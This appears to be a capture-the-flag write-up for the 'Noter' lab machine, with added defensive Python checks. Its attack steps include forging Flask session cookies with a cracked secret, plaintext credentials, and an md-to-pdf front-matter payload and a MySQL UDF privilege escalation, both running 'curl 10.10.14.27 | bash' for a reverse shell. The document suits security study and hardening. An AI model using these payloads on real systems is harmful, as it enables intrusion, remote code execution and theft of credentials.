```text
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-03 17:02 UTC
Nmap scan report for 10.10.11.160
Host is up (0.093s latency).
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.13 seconds
```
A note-taking application which stores a user's notes. After tinkering for an hour I didn't find anything interesting, then got a hint about something called flask-unsign.
It is using Flask in the background.
Flask-Unsign is a penetration testing utility that attempts to uncover a Flask server's secret key by taking a signed session cookie and verifying it against a wordlist of commonly used and publicly known secret keys (sourced from books, GitHub, StackOverflow and various other sources).
```shell
flask-unsign --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYWRtaW4ifQ.ZVBheA.rXUbROrp7iWuNewWjbc5iWOF1Bo' -w /usr/share/wordlists/rockyou.txt --no-literal-eval
```

```text
secret123
```
We have the secret, so we can create a cookie for any user we want. The cookie above is for admin, but the admin user did not actually exist on the box,
so we need to enumerate users. For that I'll be using bash, and then we can use a curl command or any fuzzing tool on all of the created cookies to see whether any of them is valid.
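From the defensive side, the root cause here is a SECRET_KEY that sits in a public wordlist: whoever recovers it can mint a valid session for any username. The following Python is an added example, not code from the box, from the Noter application or from flask-unsign, of a startup guard a Flask app can run so it refuses to boot with such a key. KNOWN_WEAK_SECRETS is a constructed, deliberately tiny stand-in for a real wordlist, and MIN_KEY_BYTES, assess_secret_key and enforce_secret_key are names made up for this illustration.

```python
import math
import secrets
from collections import Counter

# Constructed, illustrative sample of "well-known" secret values. Real wordlists
# (rockyou.txt, flask-unsign's bundled list) are far larger; in production this
# set would be loaded from such a file. (assumption for this example)
KNOWN_WEAK_SECRETS = {
    "secret", "secret123", "changeme", "password", "dev", "flask",
    "supersecretkey", "my_secret_key", "keep it secret, keep it safe",
}

MIN_KEY_BYTES = 32          # 256 bits, i.e. what secrets.token_hex(32) yields
MIN_ENTROPY_BITS = 128.0    # estimated Shannon entropy the whole key must reach


def shannon_entropy_bits(value: str) -> float:
    """Estimate the total Shannon entropy (bits) of a string from its
    character frequencies. This overestimates for dictionary words, so it is a
    floor check used alongside the wordlist lookup, not a replacement for it."""
    if not value:
        return 0.0
    n = len(value)
    per_char = -sum(c / n * math.log2(c / n) for c in Counter(value).values())
    return per_char * n


def assess_secret_key(key) -> list:
    """Return a list of findings; an empty list means the key passed every check."""
    findings = []
    if key is None or key == "" or key == b"":
        findings.append("SECRET_KEY is unset; sessions cannot be signed")
        return findings
    text = key.decode("utf-8", "replace") if isinstance(key, (bytes, bytearray)) else str(key)
    if text.lower() in KNOWN_WEAK_SECRETS:
        findings.append("SECRET_KEY is a well-known value found in public wordlists")
    if len(text.encode("utf-8")) < MIN_KEY_BYTES:
        findings.append(f"SECRET_KEY is shorter than {MIN_KEY_BYTES} bytes")
    if shannon_entropy_bits(text) < MIN_ENTROPY_BITS:
        findings.append(f"SECRET_KEY has under {MIN_ENTROPY_BITS:.0f} bits of estimated entropy")
    return findings


def generate_secret_key() -> str:
    """Produce a key that passes assess_secret_key: 32 random bytes as hex."""
    return secrets.token_hex(MIN_KEY_BYTES)


def enforce_secret_key(app_config: dict) -> None:
    """Startup guard (hypothetical helper): raise instead of serving sessions
    signed with a weak key. Call it with app.config before app.run()."""
    findings = assess_secret_key(app_config.get("SECRET_KEY"))
    if findings:
        raise RuntimeError("refusing to start: " + "; ".join(findings))


if __name__ == "__main__":
    print("secret123 ->", assess_secret_key("secret123"))
    print("generated ->", assess_secret_key(generate_secret_key()))
```

The wordlist lookup is the check that matters for this box; the length and entropy checks catch keys that are not in any list yet but are still guessable, such as a short product name. The key itself belongs in an environment variable or secrets store, never in the repository.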
```shell
time cat /usr/share/seclists/Usernames/Names/names.txt | \
while read user; do \
(flask-unsign --sign --cookie "{'logged_in': True, 'username': '$user'}" --secret 'secret123' &); \
done > names_cookies
```
Will it blast?
It did not.
```shell
wfuzz -u http://10.10.11.160:5000/dashboard -H "Cookie: session=FUZZ" -w names_cookies --hl 3
```
Pasting the second cookie, I got in as user blue.
By mistake I deleted the note before seeing it.
Shit.
Anyway, I can access this -> http://10.10.11.160:5000/note/1/
blue : blue@Noter!
Got in.
Default pass: username@sitename!
blue : blue@Noter!
ftp_admin : ftp_admin@Noter!
Got in with the ftp_admin creds to FTP and got the app source code.
```python
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'DB_user'
app.config['MYSQL_PASSWORD'] = 'DB_password'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
```

```python
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
```
It is using misc/md-to-pdf.js and then bash.
Searching for md-to-pdf.js: it's vulnerable to RCE.
https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
Content of payload.md:

```markdown
---js
((require("child_process")).execSync("curl 10.10.14.27 | bash"))
---RCE
```

And of course index.html is my revshell.
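The reason that Markdown file runs code is that gray-matter, the front-matter parser md-to-pdf relies on, treats whatever follows the opening `---` on the same line as the name of an engine, and its `js`/`javascript` engines evaluate the block. A note-taking app has no reason to accept front matter from users at all, so the cheapest fix on the application side is to reject or strip it before the Markdown reaches the converter. The Python below is an added example of that input check, not code from the Noter application or from md-to-pdf; DATA_ONLY_ENGINES, check_markdown_front_matter and sanitize_markdown are constructed names, and the example assumes gray-matter's default `---` delimiter (custom delimiters are not handled).

```python
OPEN_DELIMITER = "---"          # gray-matter's default front-matter delimiter (assumption)
CLOSE_MARKER = "\n" + OPEN_DELIMITER

# Engines that only parse data. Anything else ('js', 'javascript', ...) is refused.
DATA_ONLY_ENGINES = frozenset({"", "yaml", "yml", "json"})

# Constructed, benign samples; the js one mirrors the shape of the payload above
# without executing anything.
SAMPLE_JS_FRONT_MATTER = '---js\n({ title: "x" })\n---\nbody'
SAMPLE_YAML_FRONT_MATTER = "---\ntitle: Shopping list\n---\n# Milk"


def front_matter_language(markdown: str):
    """Return the engine name requested by a leading front-matter block
    ('' means the default YAML engine), or None if there is no such block.
    Mirrors gray-matter's rules: the block must start the document (after an
    optional BOM), and '----' or longer is a horizontal rule, not an opener."""
    text = markdown[1:] if markdown.startswith("\ufeff") else markdown
    if not text.startswith(OPEN_DELIMITER):
        return None
    rest = text[len(OPEN_DELIMITER):]
    if rest.startswith(OPEN_DELIMITER[-1]):
        return None
    first_line, _, _ = rest.partition("\n")
    return first_line.strip().lower()


def check_markdown_front_matter(markdown: str) -> list:
    """Policy check for a service that passes user Markdown to md-to-pdf:
    returns findings (empty list = acceptable)."""
    lang = front_matter_language(markdown)
    if lang is None or lang in DATA_ONLY_ENGINES:
        return []
    return [f"front matter requests engine {lang!r}, which is not a data-only parser"]


def _strip_one_block(markdown: str) -> str:
    """Remove the leading front-matter block the way gray-matter would consume it."""
    text = markdown[1:] if markdown.startswith("\ufeff") else markdown
    body = text[len(OPEN_DELIMITER):]
    idx = body.find(CLOSE_MARKER)
    if idx == -1:
        return ""                      # unterminated block: whole document is front matter
    return body[idx + len(CLOSE_MARKER):].lstrip("\r\n")


def sanitize_markdown(markdown: str) -> str:
    """Strip front matter repeatedly until the document no longer begins with a
    block. Stripping only once is not enough: '---\\n---\\n---js...' would expose
    a second, executable block once the first is removed."""
    text = markdown
    while front_matter_language(text) is not None:
        text = _strip_one_block(text)
    return text


if __name__ == "__main__":
    print(check_markdown_front_matter(SAMPLE_JS_FRONT_MATTER))
    print(repr(sanitize_markdown(SAMPLE_JS_FRONT_MATTER)))
```

Rejecting (check_markdown_front_matter) is the right behaviour for an upload endpoint where the user should see an error; stripping (sanitize_markdown) suits a background export job. Either way the converter should additionally run with the JavaScript engine disabled and in a process that cannot reach the rest of the host, since the check above only covers the default delimiter.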
MySQL is running as root.
https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
Follow the exploit with just one modification.
```sql
SHOW VARIABLES LIKE '%plugin%';
```

The output of the command is /usr/lib/x86_64-linux-gnu/mariadb19/plugin; we have to use this path instead of the one the above exploit says.
```shell
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
```

```sql
use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('curl 10.10.14.27 | bash');
```
Of course index.html is a reverse shell to port `Guess`.
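On the hardening side, the UDF path above works because three conditions hold at once: mysqld runs as root, the SQL account can write files wherever the server can (secure_file_priv is empty), and plugin_dir is writable by the server process. The `select * from mysql.func` step is also the place a defender looks, since a freshly registered `do_system` stands out there. The Python below is an added audit helper, not part of the box or of the raptor_udf2 exploit, that scores those conditions from `SHOW VARIABLES` output and a stat of plugin_dir; SAMPLE_VARIABLES and SAMPLE_FUNC_ROWS are constructed inputs, and audit_udf_exposure, PluginDirInfo and unexpected_udfs are names invented for this example.

```python
import stat
from dataclasses import dataclass

# Constructed sample of `SHOW VARIABLES` output in the tab-separated form the
# mysql client prints in batch mode (mysql -B). plugin_dir matches this box.
SAMPLE_VARIABLES = (
    "plugin_dir\t/usr/lib/x86_64-linux-gnu/mariadb19/plugin/\n"
    "secure_file_priv\t\n"
    "local_infile\tON\n"
)

# Constructed rows of `SELECT name, dl FROM mysql.func` after a UDF was registered.
SAMPLE_FUNC_ROWS = [("do_system", "raptor_udf2.so")]


def parse_show_variables(text: str) -> dict:
    """Parse 'name<TAB>value' lines into a dict; an empty value stays ''."""
    result = {}
    for line in text.splitlines():
        if "\t" not in line:
            continue
        name, _, value = line.partition("\t")
        result[name.strip()] = value.strip()
    return result


@dataclass
class PluginDirInfo:
    owner: str   # user name owning plugin_dir
    mode: int    # st_mode bits, e.g. os.stat(path).st_mode


def plugin_dir_info_from_path(path: str) -> PluginDirInfo:
    """Convenience for a live host (Unix only); not used by the samples."""
    import os
    import pwd
    st = os.stat(path)
    return PluginDirInfo(owner=pwd.getpwuid(st.st_uid).pw_name, mode=st.st_mode)


def audit_udf_exposure(variables: dict, mysqld_user: str, plugin_dir: PluginDirInfo) -> list:
    """Return findings describing which preconditions for a UDF-based escalation
    are present. Group-writable directories are ignored for brevity (simplification)."""
    findings = []
    if mysqld_user == "root":
        findings.append("mysqld runs as root: any UDF the server loads executes as root")
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: LOAD_FILE/INTO DUMPFILE may use any path the server can reach")
    writable = (
        mysqld_user == "root"
        or (plugin_dir.owner == mysqld_user and bool(plugin_dir.mode & stat.S_IWUSR))
        or bool(plugin_dir.mode & stat.S_IWOTH)
    )
    if writable:
        findings.append(f"plugin_dir {variables.get('plugin_dir', '?')} is writable by the mysqld user")
    return findings


def unexpected_udfs(func_rows, allowlist=frozenset()) -> list:
    """Detection: names in mysql.func whose (name, soname) pair is not approved."""
    return [name for name, dl in func_rows if (name, dl) not in allowlist]


if __name__ == "__main__":
    variables = parse_show_variables(SAMPLE_VARIABLES)
    for finding in audit_udf_exposure(variables, "root", PluginDirInfo("root", 0o755)):
        print("FINDING:", finding)
    print("unexpected UDFs:", unexpected_udfs(SAMPLE_FUNC_ROWS))
```

The fixes map one-to-one onto the findings: run mysqld as the unprivileged `mysql` user, set secure_file_priv to a dedicated directory (or NULL to disable file operations), keep plugin_dir owned by root and not writable by the service account, and alert on any new row in mysql.func.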